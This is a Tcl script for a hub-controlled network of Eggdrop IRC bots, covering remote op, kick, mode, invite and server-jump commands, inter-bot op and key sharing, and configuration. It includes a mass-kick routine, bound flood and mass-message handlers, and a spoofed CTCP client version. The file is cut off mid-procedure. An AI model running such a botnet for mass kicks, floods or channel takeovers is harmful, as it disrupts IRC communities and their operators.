bind chon - * chon:test;
proc chon:test {handle idx} {
  if {![matchattr $handle n]} {
    putidx $idx "Permission denied.";
    dccbroadcast "WARNING: #$handle# tried CONNECT TO BOT!";
    putlog "WARNING: #$handle# tried CONNECT TO BOT!";
    killdcc $idx;
    return 1;
  };
  return 0;
};
		      
bind dcc o|o opall dcc:opall; 
bind dcc o|o inviteall dcc:inviteall; 
bind dcc m closech dcc:closeall; 
bind dcc m opench dcc:openall; 
bind dcc m chbotnick dcc:chbotnick; 
bind dcc m rnick dcc:rnick; 
bind dcc m chbotpass dcc:chbotpass; 
bind dcc n +channel dcc:plschan; 
bind dcc n -channel dcc:mnschan; 

proc dcc:opall {handle idx arg} {
  if {[lindex $arg 0] == ""} {
    putidx $idx "Usage: .opall <yournick>"; 
    return 0
  }; 
  putcmdlog "#$handle# opall $arg"; 
  foreach c [channels] {
    if {([onchan $arg $c]) && (![isop $arg $c]) && ([botisop $c]) && ([matchattr [nick2hand $arg $c] o|o $c])} {
      pushmode $c +o $arg;
    } 
  } 
}

proc dcc:inviteall {handle idx arg} {
  if {[lindex $arg 0] == ""} {
    putidx $idx "Usage: .inviteall <yournick>"; 
    return 0
  }; 
  putcmdlog "#$handle# inviteall $arg"; 
  foreach c [channels] {
    if {([isinvonly $c]) && ([botisop $c]) && (![onchan $arg $c]) && ([matchattr $handle o|o $c])} {
      putserv "INVITE $arg $c";
    } 
  } 
}

proc dcc:closeall {handle idx chans} {
  if {($chans=="") || ($chans=="*")} {
    set chans [channels]
  }; 
  foreach chan $chans {
    if {[botisop $chan] && [validchan $chan]} {
      putlog "[vlogo]: closing [b]$chan[b]"; 
      putserv "MODE $chan +ntsim"
    } 
  } 
}

proc dcc:openall {handle idx chans} {
  if {($chans=="") || ($chans=="*")} {
    set chans [channels]
  }; 
  foreach chan $chans {
    if {[botisop $chan] && [validchan $chan]} {
      putlog "[vlogo]: opening [b]$chan[b]"; 
      putserv "MODE $chan +nt-im"
    } 
  } 
}

proc dcc:chbotnick {handle idx arg} {
  global keep-nick nick; 
  set nnick [lindex $arg 0]; 
  putcmdlog "#$handle# chbotnick $nnick"; 
  if {$nnick == ""} {
    set keep-nick 1;
    putserv "NICK $nick"; 
    return 0
  }; 
  set keep-nick 0; 
  putserv "NICK $nnick"
}

proc dcc:rnick {handle idx arg} {
  putcmdlog "#$handle# rnick"; 
  dornick;
}

proc dcc:chbotpass {handle idx arg} {
  putcmdlog "#$handle# chbotpass"; 
  runchpass; 
  putidx $idx "[vlogo] random bot-chpass successfully completed."
}

proc dcc:plschan {handle idx arg} {
  set channel [lindex $arg 0]; 
  if {![ischanname $channel]} {
    putidx $idx "Usage: .+channel \[#!\]<channel> \[key\]"; 
    return 0
  }; 
  if {[isbadchan $channel]} {
    putlog "[wlogo]: [b]$handle[b] attempted to join [b]$channel[b] !"; 
    dccbroadcast "[wlogo]: [b]$handle[b] attempted to join [b]$channel[b] !"; 
    return 0
  }; 
  set key [lindex $arg 1]; 
  if {[addchannel $channel $key]} {
    putcmdlog "#$handle# +channel $channel $key"
  } {
    putidx $idx "[wlogo]: i'm already on [b]$channel[b]"
  }; 
  return 0
}

proc dcc:mnschan {handle idx chan} {
  if {![ischanname $chan]} {
    putidx $idx "Usage: .-channel \[#!\]<channel>"; 
    return 0
  }; 
  if {![validchan $chan]} {
    putdcc $idx "[wlogo] i'm not on [b]$chan[b]."; 
    return 0
  }; 
  if {![isdynamic $chan]} {
    putidx $idx "Cannot remove [b]$chan[b], it is not a dynamic channel."; 
    return 0
  }; 
  delchannel $chan; 
  putcmdlog "#$handle# -channel $chan"
}

bind bot - rjump bot:jump; 
bind bot - rsetprc bot:setprc; 
bind bot - rmkick bot:mkick; 
bind bot - rrehash bot:rehash; 
bind bot - rop bot:rop; 
bind bot - rdop bot:rdeop; 
bind bot - rkick bot:rkick; 
bind bot - rmode bot:rmode; 
bind bot - rinvite bot:rinvite; 
bind bot - rkill bot:rkill; 
bind bot - rnick bot:rnick; 
bind bot - nnick bot:nnick; 
bind bot - rchbotnick bot:rchbotnick; 
bind bot - savenet bot:savenet; 
bind bot - rchanset bot:rchanset; 
bind bot - rchanmode bot:rchanmode; 
bind bot - mmsg bot:mmsg; 
bind bot - mflood bot:mflood; 
bind bot - chpasses bot:chpasses; 
bind bot - joinch bot:joinch; 
bind bot - partch bot:partch; 
bind bot - list:q bot:list_q;

proc bot:jump {bot cmd arg} {
  if {![ishub $bot]} {
    return 0
  }; 
  set handle [lindex $arg 0]; 
  set jserv [lindex $arg 1];
  set jport [lindex $arg 2]; 
  set jpass [lindex $arg 3]; 
  putcmdlog "#$handle@$bot# jump $jserv $jport $jpass"; 
  jump $jserv $jport $jpass;
}

proc bot:setprc {bot cmd arg} {
  if {![ishub $bot]} {
    return 0
  }; 
  set handle [lindex $arg 0]; 
  set prc1 [lindex $arg 1];
  set prc2 [lindex $arg 2];
  putcmdlog "#$handle@$bot# setprc $prc1 $prc2"; 
  ameno_setprc "$prc1" "$prc2";
}

proc bot:mkick {bot cmd arg} {
  if {![ishub $bot]} { return 0; };
  set handle [lindex $arg 0]; 
  set typ [lindex $arg 1]; 
  set chan [lindex $arg 2];
  set i [expr 0];
  set l "";
  putcmdlog "#$handle@$bot# mkick $chan $typ"; 
  foreach u [chanlist $chan] {
    if {$typ == "all"} {
      if {![matchattr [nick2hand $u $chan] o|o $chan]} {
        lappend l $u;
        incr i;
      };
    };
    if {$typ == "ops"} {
      if {![matchattr [nick2hand $u $chan] o|o $chan] && [isop $u $chan]} {
        lappend l $u;
        incr i;
      };
    };
  };
  if {$i == 0} { return 0; };
  set i [expr $i/4]; set i [expr $i+1]; set r [expr [rand $i]]; set r [expr $r*4]; set rend [expr $r+3];
  set k [join [lrange $l $r $rend] ,]; 
  putserv "KICK $chan $k :Access denied.";
}

proc bot:rehash {bot cmd arg} {
  if {![ishub $bot]} {
    return 0
  }; 
  set handle [lindex $arg 0]; 
  putcmdlog "#$handle@$bot# rehash"; 
  rehash;
}

proc bot:rop {bot cmd arg} {
  if {![ishub $bot]} {
    return 0
  }; 
  set handle [lindex $arg 0]; 
  set nick [lindex $arg 1]; 
  set channel [lindex $arg 2]; 
  putcmdlog "#$handle@$bot# op $nick $channel"; 
  if {($channel=="") || ($channel=="*")} {
    set channel [channels]
  } elseif {![validchan $channel]} {
    return 0
  }; 
  foreach c $channel {
    if {([onchan $nick $c]) && (![isop $nick $c]) && ([botisop $c]) && ([matchattr [nick2hand $nick $c] o|o $c])} {
      pushmode $c +o $nick
    } 
  } 
}

proc bot:rdeop {bot cmd arg} {
  if {![ishub $bot]} {
    return 0
  }; 
  set handle [lindex $arg 0]; 
  set nick [lindex $arg 1]; 
  set channel [lindex $arg 2]; 
  putcmdlog "#$handle@$bot# deop $nick $channel"; 
  if {($channel=="") || ($channel=="*")} {
    set channel [channels]
  } elseif {![validchan $channel]} {
    return 0
  }; 
  foreach c $channel {
    if {([onchan $nick $c]) && ([isop $nick $c]) && ([botisop $c])} {
      pushmode $c -o $nick
    } 
  } 
}


proc bot:rkick {bot cmd arg} {
  if {![ishub $bot]} {
    return 0
  }; 
  set handle [lindex $arg 0]; 
  set nick [lindex $arg 1]; 
  set channel [lindex $arg 2]; 
  set reason [lrange $arg 3 end]; 
  putcmdlog "#$handle@$bot# kick $nick $channel $reason"; 
  if {$reason==""} {
    set reason "Bitch-X BaBy!"
  }; 
  if {($channel=="*")} {
    set channel [channels]
  } elseif {![validchan $channel]} {
    return 0
  }; 
  foreach c $channel {
    if {([onchan $nick $c]) && ([botisop $c])} {
      putserv "KICK $c $nick :$reason"
    } 
  } 
}


proc bot:rmode {bot cmd arg} {
  if {![ishub $bot]} {
    return 0
  }; 
  set handle [lindex $arg 0]; 
  set chan [lindex $arg 1]; 
  set pars [lrange $arg 2 end]; 
  putcmdlog "#$handle@$bot# mode $chan $pars"; 
  if {$chan=="*"} {
    set chan [channels]
  } elseif {![validchan $chan]} {
    return 0
  }; 
  foreach c $chan {
    if {[botisop $c]} {
      putserv "MODE $c $pars"
    } 
  } 
}


proc bot:rinvite {bot cmd arg} {
  if {![ishub $bot]} {
    return 0
  }; 
  set handle [lindex $arg 0]; 
  set nick [lindex $arg 1]; 
  set channel [lindex $arg 2]; 
  putcmdlog "#$handle@$bot# invite $nick $channel"; 
  if {($channel=="") || ($channel=="*")} {
    set channel [channels]
  } elseif {![validchan $channel]} {
    return 0
  }; 
  foreach c $channel {
    if {([isinvonly $c]) && ([botisop $c]) && (![onchan $nick $c])} {
      putserv "INVITE $nick $c"
    } 
  } 
}

proc bot:rkill {bot cmd arg} {
  if {![ishub $bot]} {
    return 0
  }; 
  global nick; 
  set handle [lindex $arg 0]; 
  putcmdlog "#$handle@$bot# die"; 
  save; putserv "QUIT :$nick has no reason"; 
  utimer 1 die; 
  return 0
} 

proc bot:rnick {bot command arg} {
  if {![ishub $bot]} {
    return 0
  }; 
  set handle [lindex $arg 0]; 
  putcmdlog "#$handle@$bot# rnick"; 
  dornick;
}

proc bot:nnick {bot command arg} {
  if {![ishub $bot]} {
    return 0
  }; 
  global keep-nick nick; 
  set handle [lindex $arg 0]; 
  putcmdlog "#$handle@$bot# nick $nick"; 
  putserv "NICK $nick"; 
  set keep-nick 1;
}

proc bot:rchbotnick {bot command arg} {
  if {![ishub $bot]} {
    return 0
  }; 
  global keep-nick; 
  set handle [lindex $arg 0]; 
  set nnick [lindex $arg 1]; 
  putcmdlog "#$handle@$bot# chbotnick $nnick"; 
  set keep-nick 0; 
  putserv "NICK $nnick";
}

proc bot:savenet {bot cmd arg} {
  if {![ishub $bot]} {
    return 0
  }; 
  set handle [lindex $arg 0]; 
  putcmdlog "#$handle@$bot# save"; 
  save;
}

proc bot:list_q {bot com arg} {
  if {![ishub $bot]} {
    return 0
  }; 
  set idx [lindex $arg 0]; 
  set what [lindex $arg 1]; 
  switch -exact $what {c { foreach c [channels] {
          if [botonchan $c] {
	    set cu [llength [chanlist $c]]; 
	    if [botisop $c] {
	      lappend cl [b]@[b]$c\[[b]$cu[b]\]
	    } {
	      lappend cl "$c\[[b]$cu[b]\]"
	    } 
	  } {
	    lappend cl "$c\[[b]inactive[b]\]"
	  } 
	}; 
	if [info exists cl] {
	  putbot $bot "list:r $idx c $cl"
	} 
      } d { global server servers; 
        if {($server=="") && ($servers!="")} {
	  putbot $bot "list:r $idx d $servers"
	} 
      } p { putbot $bot "list:r $idx p [lindex $arg 2]" } s { global server server-online botnick; 
        if {$server==""} {
	  return 0
	}; 
	set serv [split $server :]; 
	set smatch [lindex $arg 2]; 
	if {$smatch!=""&&![string match [string tolower $smatch] [string tolower [lindex $serv 0]]]} {
	  return 0
	}; 
	putbot $bot "list:r $idx s [lindex $serv 0] [lindex $serv 1] $botnick [unixtime] ${server-online}"
      } u { catch {
          set uptime [string trim [exec uptime]]
	}; 
	if {[info exists uptime]} {
	  regsub -all -- "  " $uptime " " uptime
	}; 
	putbot $bot "list:r $idx u [info hostname] - [b][unames][b] - $uptime."
      } default { return 0 } 
  } 
}

proc bot:rchanset {bot idx arg} {
  if {![ishub $bot]} {
    return 0
  }; 
  set handle [lindex $arg 0]; 
  set chan [lindex $arg 1]; 
  if {![validchan $chan]} {
    return 0
  }; 
  set what [lrange $arg 2 end]; 
  if {![validchan $chan]} {
    return 0
  }; 
  putlog "#$handle@$bot# chanset $chan $what";
  channel set $chan $what; 
  savechannels;
}

proc bot:rchanmode {bot idx arg} {
  if {![ishub $bot]} {
    return 0
  }; 
  set handle [lindex $arg 0]; 
  set chan [lindex $arg 1]; 
  if {![validchan $chan]} {
    return 0
  }; 
  set what [lrange $arg 2 end]; 
  if {![validchan $chan]} {
    return 0
  };
  putlog "#$handle@$bot# chanset $chan chanmode $what"; 
  channel set $chan chanmode $what; 
  savechannels;
}

proc bot:chpasses {bot command arg} {
  if {![ishub $bot]} {
    return 0
  }; 
  set handle [lindex $arg 0]; 
  putcmdlog "#$handle@$bot# chbotpass"; 
  runchpass;
}

proc bot:joinch {bot cmd arg} {
  set serv [lindex $arg 2]; 
  if {$serv != ""} {
    global server; 
    if {$server==""||![string match [string tolower $serv] [string tolower [lindex [split $server :] 0]]]} {
      return 0
    }
  }; 
  set handle [lindex $arg 0]; 
  set chan [lindex $arg 1]; 
  if {[isbadchan $chan]} {
    putcmdlog "[wlogo]: [b]$handle@$bot[b] requested me to join [b]$chan[b] !"; 
    return 0
  }; 
  if {![ishub $bot]} {
    return 0
  }; 
  set key [lindex $arg 3]; 
  if {[addchannel $chan $key]} {
    putcmdlog "#$handle@$bot# join $chan $serv $key";
  } 
}

proc bot:partch {bot cmd arg} {
  set serv [lindex $arg 2]; 
  if {$serv != ""} {
    global server; 
    if {$server==""||![string match [string tolower $serv] [string tolower [lindex [split $server :] 0]]]} {
      return 0
    }
  }; 
  set handle [lindex $arg 0]; 
  set chan [lindex $arg 1]; 
  if {![ishub $bot]} {
    return 0
  }; 
  if {[validchan $chan] && [isdynamic $chan]} {
    delchannel $chan; 
    putcmdlog "#$handle@$bot# part $chan $serv";
  }
}

bind bot - needinv bot:needinv;
bind bot - needinv2 bot:needinv2;
bind bot - needinv3 bot:needinv3;
bind bot - needinv4 bot:needinv4;
bind bot - needinv5 bot:needinv5;

proc needinv {chan} {
    global botnick needinvchan;
    if {![onchan $botnick $chan]} {
	set needinvchan([string tolower $chan]) 1;
	putallbots "needinv [string tolower $chan] [string tolower $botnick]";
    };
};

proc bot:needinv {bot cmd arg} {
    global botnick needinvcnt;
    set chan [string tolower [lindex $arg 0]];
    set nick [string tolower [lindex $arg 1]];
    if {![validchan $chan]} { return; };
    if {[onchan $nick $chan]} { return; };
    if {![islinked $bot]} { return; };
    if {![info exists needinvcnt]} {
	set needinvcnt [expr 0];
    };
    if {[onchan $botnick $chan] && [botisop $chan] && ![onchan $nick $chan]} {
	if {$needinvcnt >= 3} { return; };
	putlog "bot:needinv Sending to $bot: needinv2 $chan $nick";
	putbot $bot "needinv2 $chan $nick";
    };
};

proc bot:needinv2 {bot cmd arg} {
    global botnick needinvchan needinvbot server;
    set chan [string tolower [lindex $arg 0]];
    set nick [string tolower [lindex $arg 1]];
    if {![validchan $chan]} { return; };
    if {$server == ""} { return; };
    if {[onchan $botnick $chan]} { return; };
    if {![islinked $bot]} { return; };
    if {![info exists needinvchan($chan)]} {
	set needinvchan($chan) 1;
    };
    if {$needinvchan($chan) == 0} { return; };
    set needinvbot($chan) [string tolower $bot];
    putlog "bot:needinv2 Sending to $bot: needinv3 $chan $nick";
    putbot $bot "needinv3 $chan $nick";
    set needinvchan($chan) 0;
    utimer 8 "set needinvchan($chan) 1";
};

proc bot:needinv3 {bot cmd arg} {
    global botnick needinvcnt;
    set chan [string tolower [lindex $arg 0]];
    set nick [string tolower [lindex $arg 1]];
    if {![validchan $chan]} { 
        putlog "bot:needinv3 Sending to $bot: needinv4 $chan $nick";
        putbot $bot "needinv4 $chan $nick";
	return;
    };
    if {[onchan $nick $chan]} { return; };
    if {![islinked $bot]} { return; };
    if {![info exists needinvcnt]} {
	set needinvcnt [expr 0];
    };
    if {[onchan $botnick $chan] && [botisop $chan] && ![onchan $nick $chan]} {
	if {$needinvcnt >= 3} { 
	    putlog "bot:needinv3 Sending to $bot: needinv4 $chan $nick";
	    putbot $bot "needinv4 $chan $nick";
	    return; 
	};
	putlog "Inviting $nick to $chan";
	putquick "INVITE $nick $chan";
	incr needinvcnt;
	utimer 8 "decrneedinvcnt";
	return;
    };
    putlog "bot:needinv3 Sending to $bot: needinv4 $chan $nick";
    putbot $bot "needinv4 $chan $nick";
    return; 
};

proc bot:needinv4 {bot cmd arg} {
    global botnick needinvchan needinvbot server;
    set chan [string tolower [lindex $arg 0]];
    set nick [string tolower [lindex $arg 1]];
    if {![validchan $chan]} { return; };
    if {$server == ""} { return; };
    if {[onchan $botnick $chan]} { return; };
    if {![islinked $bot]} { return; };
    if {![info exists needinvbot($chan)]} {
	set needinvbot($chan) [string tolower $bot];
    };
    if {[string tolower $needinvbot($chan)] == [string tolower $bot]} {
	set needinvchan($chan) 1;
	putlog "bot:needinv4 Sending to all bots: needinv2 $chan $nick";
	putallbots "needinv $chan $nick";
    };
};

proc bot:needinv5 {bot cmd arg} {
    global botnick needinvchan needinvbot server;
    set chan [string tolower [lindex $arg 0]];
    if {![validchan $chan]} { return; };
    if {![info exists needinvchan($chan)]} {
	set needinvchan($chan) 1;
    };
    if {($server != "") && ![onchan $botnick $chan] && $needinvchan($chan)} {
	set needinvchan($chan) 0;
	set needinvbot($chan) [string tolower $bot];
	utimer 10 "set needinvchan($chan) 1";
	putlog "bot:needinv5 Sending to $bot: needinv3 $chan $botnick";
	putbot $bot "needinv3 $chan $botnick";
    };
};

bind bot - needop bot:needop;
bind bot - needop2 bot:needop2;
bind bot - needop3 bot:needop3;
bind bot - needop4 bot:needop4;
bind bot - needop5 bot:needop5;

proc decrneedopcnt {} {
    global needopcnt;
    if {$needopcnt > 0} { set needopcnt [expr $needopcnt - 1]; }
}

proc decrneedinvcnt {} {
    global needinvcnt;
    if {$needinvcnt > 0} { set needinvcnt [expr $needinvcnt - 1]; }
}

proc checkop {chan} {
    global oplist oplistcnt needopcnt;
    if {(![info exists oplist($chan)]) || (![info exists oplistcnt($chan)])} {
	set oplist($chan) "";
	set oplistcnt($chan) [expr 0];
    };
    if {$oplist($chan) == ""} { return; };
    set newlist "";
    set newlistcnt [expr 0]; 
    foreach u $oplist($chan) {
	if {[onchan $u $chan] && ![isop $u $chan] && [botisop $chan]} {
	    lappend newlist $u;
	    incr newlistcnt;
	};
    };
    if {$newlistcnt < $oplistcnt($chan)} {
	if {$needopcnt >= [expr $oplistcnt($chan) - $newlistcnt]} { set needopcnt [expr $needopcnt - [expr $oplistcnt($chan) - $newlistcnt]]; };
    };
    set oplist($chan) $newlist;
    set oplistcnt($chan) $newlistcnt;
}

proc pushop {chan nick} {
    global oplist oplistcnt;
    if {(![info exists oplist($chan)]) || (![info exists oplistcnt($chan)])} {
	set oplist($chan) "";
	set oplistcnt($chan) [expr 0];
    };
    lappend oplist($chan) $nick;
    incr oplistcnt($chan);
    checkop $chan;
    if {$oplistcnt($chan) >= 3} {
	putquick "MODE $chan +ooo $oplist($chan)";
	set oplist($chan) "";
	set oplistcnt($chan) [expr 0];
    };
};

proc flushop {chan} {
    global oplist oplistcnt flushopset;
    set flushopset($chan) [expr 0];
    if {(![info exists oplist($chan)]) || (![info exists oplistcnt($chan)])} {
	set oplist($chan) "";
	set oplistcnt($chan) [expr 0];
    };
    checkop $chan;
    if {$oplistcnt($chan) != 0} {
	if {$oplistcnt($chan) == 1} { putserv "MODE $chan +o $oplist($chan)"; };
	if {$oplistcnt($chan) == 2} { putserv "MODE $chan +oo $oplist($chan)"; };
	if {$oplistcnt($chan) == 3} { putserv "MODE $chan +ooo $oplist($chan)"; };
	set oplist($chan) "";
	set oplistcnt($chan) [expr 0];
    };
};

proc needop {chan} {
    global botnick needopchan needopbot;
    if {![validchan $chan]} { return; };
    if {[onchan $botnick $chan] && ![botisop $chan]} {
	set needopchan([string tolower $chan]) 1;
	if {[chantclop1 $chan]} {
	    putlog "needop: Sending to all bots: needop [string tolower $chan] [string tolower $botnick]";
	    putallbots "needop [string tolower $chan] [string tolower $botnick]";
	};
    };
};

proc needoponjoin {chan} {
    global botnick needopchan nexttclopbot needopbot;
    if {![validchan $chan]} { return; };
    set needopchan([string tolower $chan]) 1;
    if {[chantclop1 $chan]} {
        putlog "needop: Sending to all bots: needop [string tolower $chan] [string tolower $botnick]";
        putallbots "needop [string tolower $chan] [string tolower $botnick]";
    };
};

proc bot:needop {bot cmd arg} {
    global botnick needopcnt;
    set chan [string tolower [lindex $arg 0]];
    set nick [string tolower [lindex $arg 1]];
    if {![validchan $chan]} { return; };
    if {![onchan $nick $chan]} { return; };
    if {[isop $nick $chan]} { return; };
    set bothand [string tolower [finduser $nick![getchanhost $nick $chan]]]; 
    if {($bothand != [string tolower $bot]) || ![matchattr $bothand o|o $chan]} { return; };
    if {![islinked $bot]} { return; };
    if {![info exists needopcnt]} {
	set needopcnt [expr 0];
    };
    if {[onchan $botnick $chan] && [botisop $chan]} {
	if {$needopcnt >= 3} { return; };
	putlog "bot:needop Sending to $bot: needop2 $chan $nick";
	putbot $bot "needop2 $chan $nick";
    };
};

proc bot:needop2 {bot cmd arg} {
    global botnick needopchan needopbot;
    set chan [string tolower [lindex $arg 0]];
    set nick [string tolower [lindex $arg 1]];
    if {![validchan $chan]} { return; };
    if {![onchan $botnick $chan]} { return; };
    if {[botisop $chan]} { return; };
    if {![islinked $bot]} { return; };
    if {![info exists needopchan($chan)]} {
	set needopchan($chan) 1;
    };
    if {$needopchan($chan) == 0} { return; };
    set needopbot($chan) [string tolower $bot];
    putlog "bot:needop2 Sending to $bot: needop3 $chan $nick";
    putbot $bot "needop3 $chan $nick";
    set needopchan($chan) 0;
    utimer 8 "set needopchan($chan) 1";
};

proc bot:needop3 {bot cmd arg} {
    global botnick needopcnt flushopset;
    set chan [string tolower [lindex $arg 0]];
    set nick [string tolower [lindex $arg 1]];
    if {![validchan $chan]} { 
        putlog "bot:needop3 Sending to $bot: needop4 $chan $nick";
        putbot $bot "needop4 $chan $nick";
	return;
    };
    if {![onchan $nick $chan]} { 
        putlog "bot:needop3 Sending to $bot: needop4 $chan $nick";
        putbot $bot "needop4 $chan $nick";
	return;
    };
    if {[isop $nick $chan]} { return; };
    set bothand [string tolower [finduser $nick![getchanhost $nick $chan]]]; 
    if {($bothand != [string tolower $bot]) || ![matchattr $bothand o|o $chan]} { 
        putlog "bot:needop3 Sending to $bot: needop4 $chan $nick";
        putbot $bot "needop4 $chan $nick";
	return;
    };
    if {![islinked $bot]} { return; };
    if {![info exists needopcnt]} {
	set needopcnt [expr 0];
    };
    if {[onchan $botnick $chan] && [botisop $chan]} {
	if {$needopcnt >= 3} { 
	    putlog "bot:needop3 Sending to $bot: needop4 $chan $nick";
	    putbot $bot "needop4 $chan $nick";
	    return; 
	};
	putlog "Giving op to $nick on $chan";
	pushop "$chan" "$nick";
	if {![info exists flushopset($chan)]} {
	    set flushopset($chan) [expr 0];
	};
	if {$flushopset($chan) == 0} {
	    utimer 2 "flushop $chan";
	    set flushopset($chan) [expr 1];
	};
	incr needopcnt;
	utimer 5 "decrneedopcnt";
	return;
    };
    putlog "bot:needop3 Sending to $bot: needop4 $chan $nick";
    putbot $bot "needop4 $chan $nick";
    return; 
};

proc bot:needop4 {bot cmd arg} {
    global botnick needopchan needopbot;
    set chan [string tolower [lindex $arg 0]];
    set nick [string tolower [lindex $arg 1]];
    if {![validchan $chan]} { return; };
    if {[onchan $botnick $chan] && [botisop $chan]} { return; };
    if {![islinked $bot]} { return; };
    if {![info exists needopbot($chan)]} {
	set needopbot($chan) [string tolower $bot];
    };
    if {[string tolower $needopbot($chan)] == [string tolower $bot]} {
	set needopchan($chan) 1;
	if {[chantclop1 $chan]} {
	    putlog "bot:needop4 Sending to all bots: needop $chan [string tolower $botnick]";
	    putallbots "needop $chan [string tolower $botnick]";
	};
    };
};

proc bot:needop5 {bot cmd arg} {
    global botnick needopchan needopbot nexttclopbot;
    set chan [string tolower [lindex $arg 0]];
    if {![validchan $chan]} { return; };
    if {![info exists needopchan($chan)]} {
	set needopchan($chan) 1;
    };
    if {![botisop $chan] && $needopchan($chan)} {
	if {[chantclop1 $chan]} {
	    set needopbot($chan) [string tolower $bot];
	    putlog "bot:needop5 Sending to $bot: needop3 $chan [string tolower $botnick]";
	    putbot $bot "needop3 $chan [string tolower $botnick]";
	    set needopchan($chan) 0;
	    utimer 10 "set needopchan($chan) 1";
	};
    };
};

bind bot - needkey bot:needkey;
bind bot - needkey2 bot:needkey2;

proc needkey {chan} {
    global botnick;
    putallbots "needkey [string tolower $chan]";
};

proc bot:needkey {bot cmd arg} {
    global botnick;
    set chan [string tolower [lindex $arg 0]];
    if {![onchan $botnick $chan]} { return; };
    if {![islinked $bot]} { return; };
    if {[getchanmode $chan] == ""} { return; };
    for {set i [expr 0];} {([string range [getchanmode $chan] $i $i] != " ") && ([string range [getchanmode $chan] $i $i] != "")} {incr i} {};
    set chanmode "[string range [getchanmode $chan] 0 [expr $i - 1]]";
    if {$chanmode == ""} { return; };
    for {set j [expr $i + 1];} {([string range [getchanmode $chan] $j $j] != " ") && ([string range [getchanmode $chan] $j $j] != "")} {incr j} {};
    if {[string match *k* $chanmode]} {
	putbot $bot "needkey2 $chan [string range [getchanmode $chan] [expr $i + 1] $j]
"; 
	putlog "[glogo]: giving a key for [b]$chan[b] to [b]$bot[b]";
    };
};

proc bot:needkey2 {bot cmd arg} {
    for {set i [expr 0];} {([string range $arg $i $i] != " ") && ([string range $arg $i $i] != "")} {incr i} {};
    set chan "[string tolower [string range $arg 0 [expr $i - 1]]]";
    for {set j [expr $i + 1];} {([string range $arg $j $j] != " ") && ([string range $arg $j $j] != "")} {incr j} {};
    if {[validchan $chan] && ![botonchan $chan]} {
	putserv "JOIN $chan [string range $arg [expr $i + 1] $j]";
    }; 
};

bind mode - "*+o*" mode:gotops;
bind join b * join:qop;

proc mode:gotops {nick uh handle chan modechange victim} {
    if {![isbotnick $victim]} { return 0; };
    foreach b [bots] {
        if {[matchattr $b o|o $chan] && [onchan [hand2nick $b $chan] $chan] && ![isop [hand2nick $b $chan] $chan]} {
	    lappend opoffer $b;
	    putbot $b "needop5 [string tolower $chan]";
	};
    };
    if [info exists opoffer] {
        putlog "[glogo]: Got op on [b]$chan[b],  sending op-offer";
    };
    foreach b [bots] {
        if {[matchattr $b o|o $chan] && ![onchan [hand2nick $b $chan] $chan]} {
	    lappend invoffer $b;
	    putbot $b "needinv5 [string tolower $chan]";
	};
    };
    if [info exists invoffer] {
	putlog "[glogo]: Got op on [b]$chan[b], +i, sending invite-offer";
    };
}
;

proc join:qop {nick uhost bot chan} {
    if {[chantclop1 $chan]} {
	if {![isbotnick $nick] && [botisop $chan] && [islinked $bot] && [matchattr $bot o|o $chan]} {
	    putlog "join:qop Sending to $bot: needop5 [string tolower $chan]";
	    putbot $bot "needop5 [string tolower $chan]"
	};
    };
}
;

set console "csob"; 
set timezone "CET"; 
set offset "0"; 
set max-logs 5; 
set max-logsize 4000; 
set quick-logs 0; 
set log-time 1; 
set keep-all-logs 0; 
set switch-logfiles-at 15; 
set quiet-save 1; 
set sort-users 0; 
set help-path "help/"; 
set temp-path "./"; 
set telnet-banner ""; 
set protect-telnet 1; 
set dcc-sanitycheck 0; 
set ident-timeout 10; 
set require-p 1; 
set open-telnets 0; 
set stealth-telnets 1; 
set use-telnet-banner 0; 
set connect-timeout 60; 
set dcc-flood-thr 8; 
set telnet-flood 5:60; 
set paranoid-telnet-flood 1; 
set resolve-timeout 20; 
set ignore-time 30; 
set hourly-updates 15; 
set notify-newusers ""; 
set default-flags ""; 
set whois-fields "url birthday"; 
set share-unlinks 0; 
set die-on-sighup 0; 
set die-on-sigterm 0; 
set max-dcc 50; 
set dcc-portrange 1024:65535; 
set enable-simul 1; 
set allow-dk-cmds 0; 
set mod-path "modules/"; 
set ban-time [expr [rand 60] + 120]; 
set exempt-time [expr [rand 30] + 30]; 
set invite-time [expr [rand 30] + 30]; 
set force-expire 1; 
set share-greet 0; 
set use-info 1; 
set net-type 1;
set init-server { putserv "MODE $botnick +i" }; 
set keep-nick 1; 
set use-ison 1; 
set strict-host 1; 
set quiet-reject 1; 
set lowercase-ctcp 0; 
set answer-ctcp 3; 
set flood-msg 5:60; 
set flood-ctcp 3:60; 
set never-give-up 1; 
set strict-servernames 0; 
set default-port 6667; 
set server-cycle-wait 10; 
set server-timeout 120; 
set servlimit 0; 
set check-stoned 1; 
set use-console-r 0; 
set debug-output 0; 
set serverror-quit 1; 
set max-queue-msg 250; 
set trigger-on-ignore 0; 
set double-mode 0; 
set double-server 0; 
set double-help 0; 
set use-silence 0; 
set check-mode-r 1; 
set ctcp-mode 1; 
set ctcp-version "ircII EPIC4pre2.004-19990718 *IX - Accept no limitations."; 
set ctcp-finger "$realname, Idle 2 seconds"; 
set ctcp-userinfo "http://www.mistik.net | http://irc.mistik.net"; 
set bounce-bans 0; 
set kick-bogus-bans 0; 
set bounce-bogus-bans 0; 
set max-bans 30; 
set max-modes 30; 
set allow-desync 0; 
set kick-bogus 0; 
set kick-fun 0; 
set learn-users 0; 
set wait-split 900; 
set wait-info 45; 
set mode-buf-length 200; 
set no-chanrec-info 0; 
set max-exempts 30; 
set max-invites 30; 
set kick-bogus-exempts 0; 
set bounce-bogus-exempts 0; 
set kick-bogus-invites 0; 
set bounce-bogus-invites 0; 
set use-exempts 1; 
set use-invites 1; 
set prevent-mixing 1; 
set kick-method 4; 
set modes-per-line 3; 
set use-354 0; 
set rfc-compliant 1; 
set max-dloads 3; 
set dcc-block 0; 
set copy-to-tmp 0; 
set xfer-timeout 120; 
set allow-resync 0; 
set private-owner 0; 
set private-global 0; 
set private-globals ""; 
set private-user 0; 
set max-notes 60; 
set note-life 60; 
set allow-fwd 1; 
set notify-users 1; 
set notify-onjoin 1; 
set console-autosave 1; 
set force-channel 0; 
set info-party 0
;

foreach channel [channels] {
  
channel set $channel need-op "needop $channel"
; 
  channel set $channel need-invite "needinv $channel"; 
  channel set $channel need-key "needkey $channel"
; 
  channel set $channel need-unban "needinv $channel"
; 
  channel set $channel need-limit "needinv $channel";
  set needinvcnt [expr 0];
  set needinvchan($channel) 1;
  set needopcnt [expr 0];
  set needopchan($channel) 1;

}

;

timer 6 idlekill;
bind filt - "\001ACTION *\001" filt:dcc_action; 
bind filt - "/me *" filt:telnet_action; 
bind msg - AmenO ignore:idle; 
bind sign o * sign:check
;

proc filt:dcc_action {idx text} {
